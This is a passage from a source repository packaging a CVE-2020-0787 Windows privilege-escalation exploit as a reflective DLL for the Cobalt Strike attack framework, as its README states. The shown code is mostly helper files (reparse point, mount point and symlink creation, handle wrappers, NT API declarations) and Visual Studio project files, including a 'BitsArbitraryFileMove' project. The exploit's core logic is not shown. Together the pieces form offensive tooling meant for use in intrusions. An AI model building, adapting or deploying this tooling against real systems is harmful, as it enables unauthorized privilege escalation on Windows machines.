174 | memcpy(buffer->SymbolicLinkReparseBuffer.PathBuffer, target.c_str(), target_byte_size + 2); 175 | buffer->SymbolicLinkReparseBuffer.PrintNameOffset = static_cast(target_byte_size + 2); 176 | buffer->SymbolicLinkReparseBuffer.PrintNameLength = static_cast(printname_byte_size); 177 | memcpy(buffer->SymbolicLinkReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + 2); 178 | buffer->SymbolicLinkReparseBuffer.Flags = relative ? SYMLINK_FLAG_RELATIVE : 0; 179 | 180 | return buffer; 181 | } 182 | 183 | static bool CreateMountPointInternal(const std::wstring& path, typed_buffer_ptr& buffer) 184 | { 185 | ScopedHandle handle = OpenReparsePoint(path, true); 186 | 187 | if (!handle.IsValid()) 188 | { 189 | return false; 190 | } 191 | 192 | return SetReparsePoint(handle, buffer); 193 | } 194 | 195 | static bool CreateMountPointInternal(const ScopedHandle& handle, typed_buffer_ptr& buffer) 196 | { 197 | return SetReparsePoint(handle, buffer); 198 | } 199 | 200 | std::wstring FixupPath(std::wstring str) 201 | { 202 | if (str[0] != '\\') 203 | { 204 | return L"\\??\\" + str; 205 | } 206 | 207 | return str; 208 | } 209 | 210 | bool ReparsePoint::CreateMountPoint(const std::wstring& path, const std::wstring& target, const std::wstring& printname) 211 | { 212 | if (target.length() == 0) 213 | { 214 | return false; 215 | } 216 | 217 | return CreateMountPointInternal(path, BuildMountPoint(FixupPath(target), printname)); 218 | } 219 | 220 | bool ReparsePoint::CreateSymlink(const std::wstring& path, const std::wstring& target, const std::wstring& printname, bool relative) 221 | { 222 | if (target.length() == 0) 223 | { 224 | return false; 225 | } 226 | 227 | return CreateMountPointInternal(path, BuildSymlink(!relative ? FixupPath(target) : target, printname, relative)); 228 | } 229 | 230 | bool ReparsePoint::CreateSymlink(HANDLE h, const std::wstring& target, const std::wstring& printname, bool relative) 231 | { 232 | ScopedHandle handle(h, true); 233 | 234 | if (!handle.IsValid()) 235 | { 236 | return false; 237 | } 238 | 239 | return CreateMountPointInternal(handle, BuildSymlink(!relative ? FixupPath(target) : target, printname, relative)); 240 | } 241 | 242 | bool ReparsePoint::DeleteMountPoint(const std::wstring& path) 243 | { 244 | REPARSE_GUID_DATA_BUFFER reparse_buffer = { 0 }; 245 | reparse_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; 246 | 247 | ScopedHandle handle = OpenReparsePoint(path, true); 248 | 249 | return DeleteReparsePoint(handle, &reparse_buffer); 250 | } 251 | 252 | bool ReparsePoint::CreateRawMountPoint(const std::wstring& path, DWORD reparse_tag, const std::vector& buffer) 253 | { 254 | typed_buffer_ptr reparse_buffer(8 + buffer.size()); 255 | 256 | reparse_buffer->ReparseTag = reparse_tag; 257 | reparse_buffer->ReparseDataLength = static_cast(buffer.size()); 258 | reparse_buffer->Reserved = 0; 259 | memcpy(reparse_buffer->GenericReparseBuffer.DataBuffer, &buffer[0], buffer.size()); 260 | 261 | return CreateMountPointInternal(path, reparse_buffer); 262 | } 263 | 264 | static typed_buffer_ptr GetReparsePointData(ScopedHandle handle) 265 | { 266 | typed_buffer_ptr buf(MAXIMUM_REPARSE_DATA_BUFFER_SIZE); 267 | 268 | DWORD dwBytesReturned; 269 | if (!DeviceIoControl(handle, 270 | FSCTL_GET_REPARSE_POINT, 271 | NULL, 272 | 0, 273 | (LPVOID)buf, 274 | buf.size(), 275 | &dwBytesReturned, 276 | 0) 277 | ) 278 | { 279 | g_last_error = GetLastError(); 280 | buf.reset(0); 281 | } 282 | 283 | return buf; 284 | } 285 | 286 | std::wstring ReparsePoint::GetMountPointTarget(const std::wstring& path) 287 | { 288 | ScopedHandle handle = OpenReparsePoint(path, false); 289 | if (!handle.IsValid()) 290 | { 291 | return L""; 292 | } 293 | 294 | typed_buffer_ptr buf = GetReparsePointData(handle); 295 | 296 | if (buf.size() == 0) 297 | { 298 | return L""; 299 | } 300 | 301 | if (buf->ReparseTag != IO_REPARSE_TAG_MOUNT_POINT) 302 | { 303 | g_last_error = ERROR_REPARSE_TAG_MISMATCH; 304 | return L""; 305 | } 306 | 307 | WCHAR* base = &buf->MountPointReparseBuffer.PathBuffer[buf->MountPointReparseBuffer.SubstituteNameOffset / 2]; 308 | 309 | return std::wstring(base, base + (buf->MountPointReparseBuffer.SubstituteNameLength / 2)); 310 | } 311 | 312 | bool ReparsePoint::IsReparsePoint(const std::wstring& path) 313 | { 314 | ScopedHandle handle = OpenReparsePoint(path, false); 315 | BY_HANDLE_FILE_INFORMATION file_info = { 0 }; 316 | 317 | return handle.IsValid() && GetFileInformationByHandle(handle, &file_info) && file_info.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT; 318 | } 319 | 320 | static bool ReadReparsePoint(const std::wstring& path, typed_buffer_ptr& reparse_buffer) 321 | { 322 | ScopedHandle handle = OpenReparsePoint(path, false); 323 | reparse_buffer.reset(4096); 324 | DWORD dwSize; 325 | 326 | bool ret = DeviceIoControl(handle, FSCTL_GET_REPARSE_POINT, nullptr, 0, reparse_buffer, reparse_buffer.size(), &dwSize, nullptr) == TRUE; 327 | if (!ret) 328 | { 329 | g_last_error = GetLastError(); 330 | return false; 331 | } 332 | else 333 | { 334 | reparse_buffer.resize(dwSize); 335 | return true; 336 | } 337 | } 338 | 339 | static bool IsReparseTag(const std::wstring& path, DWORD reparse_tag) 340 | { 341 | typed_buffer_ptr buffer; 342 | 343 | if (ReadReparsePoint(path, buffer)) 344 | { 345 | return buffer->ReparseTag == reparse_tag; 346 | } 347 | else 348 | { 349 | return false; 350 | } 351 | } 352 | 353 | bool ReparsePoint::IsMountPoint(const std::wstring& path) 354 | { 355 | return IsReparseTag(path, IO_REPARSE_TAG_MOUNT_POINT); 356 | } 357 | 358 | bool ReparsePoint::IsSymlink(const std::wstring& path) 359 | { 360 | return IsReparseTag(path, IO_REPARSE_TAG_SYMLINK); 361 | } 362 | 363 | bool ReparsePoint::ReadMountPoint(const std::wstring& path, std::wstring& target, std::wstring& printname) 364 | { 365 | typed_buffer_ptr buffer; 366 | 367 | if (ReadReparsePoint(path, buffer) && buffer->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) 368 | { 369 | WCHAR* target_name = &buffer->MountPointReparseBuffer.PathBuffer[buffer->MountPointReparseBuffer.SubstituteNameOffset / 2]; 370 | WCHAR* display_name = &buffer->MountPointReparseBuffer.PathBuffer[buffer->MountPointReparseBuffer.PrintNameOffset / 2]; 371 | target.assign(target_name, target_name + buffer->MountPointReparseBuffer.SubstituteNameLength / 2); 372 | printname.assign(display_name, display_name + buffer->MountPointReparseBuffer.PrintNameLength / 2); 373 | return true; 374 | } 375 | else 376 | { 377 | return false; 378 | } 379 | } 380 | 381 | bool ReparsePoint::ReadSymlink(const std::wstring& path, std::wstring& target, std::wstring& printname, unsigned int* flags) 382 | { 383 | typed_buffer_ptr buffer; 384 | 385 | if (ReadReparsePoint(path, buffer) && buffer->ReparseTag == IO_REPARSE_TAG_SYMLINK) 386 | { 387 | WCHAR* target_name = &buffer->SymbolicLinkReparseBuffer.PathBuffer[buffer->SymbolicLinkReparseBuffer.SubstituteNameOffset / 2]; 388 | WCHAR* display_name = &buffer->SymbolicLinkReparseBuffer.PathBuffer[buffer->SymbolicLinkReparseBuffer.PrintNameOffset / 2]; 389 | target.assign(target_name, target_name + buffer->SymbolicLinkReparseBuffer.SubstituteNameLength / 2); 390 | printname.assign(display_name, display_name + buffer->SymbolicLinkReparseBuffer.PrintNameLength / 2); 391 | *flags = buffer->SymbolicLinkReparseBuffer.Flags; 392 | return true; 393 | } 394 | else 395 | { 396 | return false; 397 | } 398 | } 399 | 400 | bool ReparsePoint::ReadRaw(const std::wstring& path, unsigned int* reparse_tag, std::vector& raw_data) 401 | { 402 | typed_buffer_ptr buffer; 403 | 404 | if (ReadReparsePoint(path, buffer)) 405 | { 406 | *reparse_tag = buffer->ReparseTag; 407 | raw_data.resize(buffer->ReparseDataLength); 408 | memcpy(&raw_data[0], buffer->GenericReparseBuffer.DataBuffer, buffer->ReparseDataLength); 409 | return true; 410 | } 411 | else 412 | { 413 | return false; 414 | } 415 | 416 | return false; 417 | } 418 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/ReparsePoint.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | class ReparsePoint 7 | { 8 | public: 9 | 10 | static bool CreateMountPoint(const std::wstring& path, const std::wstring& target, const std::wstring& printname); 11 | static bool DeleteMountPoint(const std::wstring& path); 12 | static std::wstring GetMountPointTarget(const std::wstring& path); 13 | static bool CreateRawMountPoint(const std::wstring& path, DWORD reparse_tag, const std::vector& buffer); 14 | static bool IsMountPoint(const std::wstring& path); 15 | static bool IsSymlink(const std::wstring& path); 16 | static bool ReadMountPoint(const std::wstring& path, std::wstring& target, std::wstring& printname); 17 | static bool ReadSymlink(const std::wstring& path, std::wstring& target, std::wstring& printname, unsigned int* flags); 18 | static bool ReadRaw(const std::wstring& path, unsigned int* reparse_tag, std::vector& raw_data); 19 | static bool IsReparsePoint(const std::wstring& path); 20 | static bool CreateSymlink(const std::wstring& path, const std::wstring& target, const std::wstring& printname, bool relative); 21 | static bool CreateSymlink(HANDLE h, const std::wstring& target, const std::wstring& printname, bool relative); 22 | 23 | static int GetLastError(); 24 | }; 25 | 26 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/ScopedHandle.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "ScopedHandle.h" 17 | 18 | static HANDLE Duplicate(HANDLE h) 19 | { 20 | HANDLE dup; 21 | 22 | if ((h == INVALID_HANDLE_VALUE) || !DuplicateHandle(GetCurrentProcess(), h, GetCurrentProcess(), &dup, 0, FALSE, DUPLICATE_SAME_ACCESS)) 23 | { 24 | return nullptr; 25 | } 26 | else 27 | { 28 | return dup; 29 | } 30 | } 31 | 32 | ScopedHandle::ScopedHandle(HANDLE h, bool duplicate) 33 | { 34 | if (duplicate) 35 | { 36 | g_h = Duplicate(h); 37 | } 38 | else 39 | { 40 | g_h = h; 41 | } 42 | } 43 | 44 | ScopedHandle::ScopedHandle(const ScopedHandle& other) 45 | { 46 | g_h = Duplicate(other.g_h); 47 | } 48 | 49 | ScopedHandle& ScopedHandle::operator=(const ScopedHandle& other) 50 | { 51 | if (this != &other) 52 | { 53 | g_h = Duplicate(other.g_h); 54 | } 55 | 56 | return *this; 57 | } 58 | 59 | ScopedHandle::ScopedHandle(ScopedHandle&& other) 60 | { 61 | g_h = other.g_h; 62 | other.g_h = nullptr; 63 | } 64 | 65 | ScopedHandle& ScopedHandle::operator=(ScopedHandle&& other) 66 | { 67 | if (this != &other) 68 | { 69 | g_h = other.g_h; 70 | other.g_h = nullptr; 71 | } 72 | 73 | return *this; 74 | } 75 | 76 | void ScopedHandle::Close() 77 | { 78 | if (IsValid()) 79 | { 80 | CloseHandle(g_h); 81 | g_h = nullptr; 82 | } 83 | } 84 | 85 | void ScopedHandle::Reset(HANDLE h) 86 | { 87 | Close(); 88 | g_h = h; 89 | } 90 | 91 | ScopedHandle::~ScopedHandle() 92 | { 93 | Close(); 94 | } 95 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/ScopedHandle.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | class ScopedHandle 3 | { 4 | HANDLE g_h; 5 | 6 | public: 7 | ScopedHandle(HANDLE h, bool duplicate); 8 | void Close(); 9 | void Reset(HANDLE h); 10 | bool IsValid() const { 11 | return (g_h != nullptr) && (g_h != INVALID_HANDLE_VALUE); 12 | } 13 | ScopedHandle(const ScopedHandle& other); 14 | ScopedHandle& operator=(const ScopedHandle& other); 15 | 16 | ScopedHandle(ScopedHandle&& other); 17 | ScopedHandle& operator=(ScopedHandle&& other); 18 | 19 | operator HANDLE() const { 20 | return g_h; 21 | } 22 | 23 | ~ScopedHandle(); 24 | }; 25 | 26 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/ntimports.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #define DIRECTORY_QUERY 0x0001 7 | #define DIRECTORY_TRAVERSE 0x0002 8 | #define DIRECTORY_CREATE_OBJECT 0x0004 9 | #define DIRECTORY_CREATE_SUBDIRECTORY 0x0008 10 | #define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) 11 | 12 | typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); 13 | typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess, 14 | POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something); 15 | typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); 16 | typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString); 17 | 18 | #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 19 | 20 | typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName); 21 | typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); 22 | typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength); 23 | typedef NTSTATUS(NTAPI* _NtOpenFile)( 24 | _Out_ PHANDLE FileHandle, 25 | _In_ ACCESS_MASK DesiredAccess, 26 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 27 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 28 | _In_ ULONG ShareAccess, 29 | _In_ ULONG OpenOptions 30 | ); 31 | 32 | const ULONG FileLinkInformation = 11; 33 | 34 | typedef struct _FILE_LINK_INFORMATION { 35 | BOOLEAN ReplaceIfExists; 36 | HANDLE RootDirectory; 37 | ULONG FileNameLength; 38 | WCHAR FileName[1]; 39 | } FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; 40 | 41 | typedef NTSTATUS(__stdcall *_ZwSetInformationFile)( 42 | _In_ HANDLE FileHandle, 43 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 44 | _In_ PVOID FileInformation, 45 | _In_ ULONG Length, 46 | _In_ ULONG FileInformationClass 47 | ); 48 | typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status); 49 | void SetNtLastError(NTSTATUS status); 50 | 51 | #define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x) 52 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // CommonUtils.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | #include 10 | 11 | FARPROC GetProcAddressNT(LPCSTR lpName); -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/typed_buffer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | template 7 | class typed_buffer_ptr { 8 | std::unique_ptr buffer_; 9 | size_t size_; 10 | 11 | public: 12 | typed_buffer_ptr() { 13 | } 14 | 15 | explicit typed_buffer_ptr(size_t size) { 16 | reset(size); 17 | } 18 | 19 | void reset(size_t size) { 20 | buffer_.reset(new char[size]); 21 | memset(buffer_.get(), 0, size); 22 | size_ = size; 23 | } 24 | 25 | void resize(size_t size) { 26 | std::unique_ptr tmp(new char[size]); 27 | 28 | memcpy(tmp.get(), buffer_.get(), min(size, size_)); 29 | 30 | buffer_ = std::move(tmp); 31 | } 32 | 33 | operator T*() { 34 | return reinterpret_cast(buffer_.get()); 35 | } 36 | 37 | operator const T*() const { 38 | return cget(); 39 | } 40 | 41 | T* operator->() const { 42 | return reinterpret_cast(buffer_.get()); 43 | } 44 | 45 | const T* cget() const { 46 | return interpret_cast(buffer_.get()); 47 | } 48 | 49 | typed_buffer_ptr(const typed_buffer_ptr& other) = delete; 50 | typed_buffer_ptr& typed_buffer_ptr::operator=(const typed_buffer_ptr& other) = delete; 51 | 52 | typed_buffer_ptr(typed_buffer_ptr&& other) { 53 | buffer_ = std::move(other.buffer_); 54 | size_ = other.size_; 55 | other.size_ = 0; 56 | } 57 | 58 | typed_buffer_ptr& operator=(typed_buffer_ptr&& other) { 59 | if (this != &other) 60 | { 61 | buffer_ = std::move(other.buffer_); 62 | size_ = other.size_; 63 | other.size_ = 0; 64 | } 65 | } 66 | 67 | size_t size() const { 68 | return size_; 69 | } 70 | }; -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/README.md: -------------------------------------------------------------------------------- 1 | ## CVE-2020-0787_CNA ReflectiveDllSource For Cobalt Strike 2 | Use named pipes for CVE-2020-0787 command execution response. 3 | 4 | ![](https://cdn.jsdelivr.net/gh/yanghaoi/ReflectiveDllSource/CVE-2020-0787_CNA/CobaltStrikeShow.gif) 5 | 6 | ## Get More CNA 7 | 8 | https://github.com/yanghaoi/CobaltStrike_CNA 9 | 10 | ## Reference 11 | https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30503.244 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BitsArbitraryFileMove", "BitsArbitraryFileMove\BitsArbitraryFileMove.vcxproj", "{36C758EB-8C26-4DD6-915E-7030275418A5}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}" 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|ARM = Debug|ARM 15 | Debug|Win32 = Debug|Win32 16 | Debug|x64 = Debug|x64 17 | Release|ARM = Release|ARM 18 | Release|Win32 = Release|Win32 19 | Release|x64 = Release|x64 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Debug|ARM 23 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Debug|ARM 24 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Debug|Win32 26 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Debug|x64 27 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Debug|x64 28 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM 29 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM 30 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 31 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 32 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 33 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 34 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|ARM.ActiveCfg = Debug|ARM 35 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|ARM.Build.0 = Debug|ARM 36 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|Win32.ActiveCfg = Debug|Win32 37 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|Win32.Build.0 = Debug|Win32 38 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|x64.ActiveCfg = Debug|x64 39 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|x64.Build.0 = Debug|x64 40 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|ARM.ActiveCfg = Release|ARM 41 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|ARM.Build.0 = Release|ARM 42 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|Win32.ActiveCfg = Release|Win32 43 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|Win32.Build.0 = Release|Win32 44 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|x64.ActiveCfg = Release|x64 45 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|x64.Build.0 = Release|x64 46 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|ARM.ActiveCfg = Debug|ARM 47 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|ARM.Build.0 = Debug|ARM 48 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|Win32.ActiveCfg = Debug|Win32 49 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|Win32.Build.0 = Debug|Win32 50 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|x64.ActiveCfg = Debug|x64 51 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|x64.Build.0 = Debug|x64 52 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|ARM.ActiveCfg = Release|ARM 53 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|ARM.Build.0 = Release|ARM 54 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|Win32.ActiveCfg = Release|Win32 55 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|Win32.Build.0 = Release|Win32 56 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|x64.ActiveCfg = Release|x64 57 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|x64.Build.0 = Release|x64 58 | EndGlobalSection 59 | GlobalSection(SolutionProperties) = preSolution 60 | HideSolutionNode = FALSE 61 | EndGlobalSection 62 | GlobalSection(ExtensibilityGlobals) = postSolution 63 | SolutionGuid = {056E3D45-E7FD-4BEE-95A5-0CBAF9DA7DB3} 64 | EndGlobalSection 65 | EndGlobal 66 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 15 | 18 | 19 | 20 | 21 | 22 | 29 | 32 | 35 | 38 | 41 | 44 | 55 | 58 | 61 | 64 | 71 | 74 | 77 | 80 | 83 | 86 | 89 | 92 | 93 | 100 | 103 | 106 | 109 | 112 | 116 | 127 | 130 | 133 | 136 | 143 | 146 | 149 | 152 | 155 | 158 | 161 | 164 | 165 | 173 | 176 | 179 | 182 | 185 | 188 | 200 | 203 | 206 | 209 | 218 | 221 | 224 | 227 | 230 | 233 | 236 | 240 | 241 | 249 | 252 | 255 | 258 | 261 | 265 | 280 | 283 | 286 | 289 | 299 | 302 | 305 | 308 | 311 | 314 | 317 | 321 | 322 | 323 | 324 | 325 | 326 | 331 | 334 | 335 | 338 | 339 | 340 | 345 | 348 | 349 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | ARM 7 | 8 | 9 | Debug 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | ARM 19 | 20 | 21 | Release 22 | Win32 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} 31 | reflective_dll 32 | Win32Proj 33 | 10.0 34 | 35 | 36 | 37 | DynamicLibrary 38 | v142 39 | Unicode 40 | false 41 | 42 | 43 | DynamicLibrary 44 | v142 45 | Unicode 46 | false 47 | 48 | 49 | DynamicLibrary 50 | v142 51 | Unicode 52 | 53 | 54 | DynamicLibrary 55 | v142 56 | Unicode 57 | 58 | 59 | v142 60 | DynamicLibrary 61 | Unicode 62 | 63 | 64 | v142 65 | Unicode 66 | DynamicLibrary 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | <_ProjectFileVersion>11.0.50727.1 86 | 87 | 88 | $(SolutionDir)$(Configuration)\$(Platform) 89 | $(Configuration)\$(Platform)\ 90 | true 91 | 92 | 93 | $(SolutionDir)$(Configuration)\$(Platform) 94 | $(Configuration)\$(Platform)\ 95 | true 96 | 97 | 98 | $(SolutionDir)$(Configuration)\$(Platform)\ 99 | $(Configuration)\$(Platform)\ 100 | false 101 | false 102 | 103 | 104 | $(SolutionDir)$(Configuration)\$(Platform) 105 | $(Configuration)\$(Platform)\ 106 | false 107 | false 108 | 109 | 110 | .dll 111 | $(SolutionDir)$(Configuration)\$(Platform)\ 112 | $(Configuration)\$(Platform)\ 113 | 114 | 115 | $(SolutionDir)$(Configuration)\$(Platform) 116 | $(Configuration)\$(Platform)\ 117 | 118 | 119 | 120 | 121 | Disabled 122 | WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 123 | true 124 | EnableFastChecks 125 | MultiThreadedDebug 126 | 127 | 128 | Level3 129 | ProgramDatabase 130 | 131 | 132 | true 133 | Windows 134 | 135 | 136 | 137 | 138 | 139 | Disabled 140 | WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) 141 | true 142 | EnableFastChecks 143 | MultiThreadedDebugDLL 144 | 145 | 146 | Level3 147 | ProgramDatabase 148 | 149 | 150 | true 151 | Windows 152 | 153 | 154 | 155 | 156 | 157 | MaxSpeed 158 | OnlyExplicitInline 159 | true 160 | Size 161 | false 162 | WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 163 | MultiThreaded 164 | true 165 | 166 | 167 | Level3 168 | ProgramDatabase 169 | CompileAsCpp 170 | false 171 | 172 | 173 | $(OutDir)$(ProjectName).dll 174 | false 175 | Windows 176 | true 177 | true 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | MaxSpeed 188 | OnlyExplicitInline 189 | true 190 | Size 191 | false 192 | WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 193 | MultiThreaded 194 | true 195 | 196 | 197 | Level3 198 | ProgramDatabase 199 | CompileAsCpp 200 | 201 | 202 | $(OutDir)$(ProjectName).dll 203 | false 204 | Windows 205 | true 206 | true 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | false 216 | 217 | 218 | MultiThreaded 219 | Level3 220 | OnlyExplicitInline 221 | true 222 | Size 223 | true 224 | 